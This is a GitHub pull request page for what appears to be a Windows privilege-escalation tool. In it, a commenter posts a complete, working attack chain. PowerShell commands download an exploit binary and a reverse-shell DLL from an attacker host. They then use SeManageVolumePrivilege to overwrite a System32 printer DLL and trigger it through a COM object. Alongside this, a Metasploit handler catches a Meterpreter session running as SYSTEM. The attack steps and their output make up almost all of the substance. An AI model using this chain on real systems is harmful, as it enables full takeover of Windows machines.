Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update README.md #1

Open
wants to merge 1 commit into
base: main
Choose a base branch
from

Conversation

hacks2learn
Copy link

Updated the invocation method as the systeminfo suggestion no longer appears to work.

Updated the invocation method as the systeminfo suggestion no longer appears to work.
@12345qwert123456
Copy link

I checked it works

On host

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled
PS C:\> iwr http://192.168.1.4:8888/SeManageVolumeAbuse.exe -O SeManageVolumeAbuse.exe
PS C:\> iwr http://192.168.1.4:8888/reverse.dll -O reverse.dll
PS C:\> .\SeManageVolumeAbuse.exe
Success! Permissions changed.
PS C:\> copy .\reverse.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
copy : Access to the path 'C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll' is denied.
At line:1 char:1
+ copy .\reverse.dll C:\Windows\System32\spool\drivers\x64\3\Printconfi ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\reverse.dll:FileInfo) [Copy-Item], UnauthorizedAccessException
    + FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

PS C:\> .\SeManageVolumeAbuse.exe                                                 
Success! Permissions changed.
PS C:\> copy .\reverse.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
PS C:\> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\> $object = [Activator]::CreateInstance($type)

On kali

┌──(kali㉿kali)-[~/Desktop]
└─$ msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.1.4; set lport 6666; exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.1.4
lport => 6666
[*] Started reverse TCP handler on 192.168.1.4:6666 
[*] Sending stage (201798 bytes) to 192.168.1.9
[*] Meterpreter session 1 opened (192.168.1.4:6666 -> 192.168.1.9:65150) at 2024-10-30 05:42:48 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants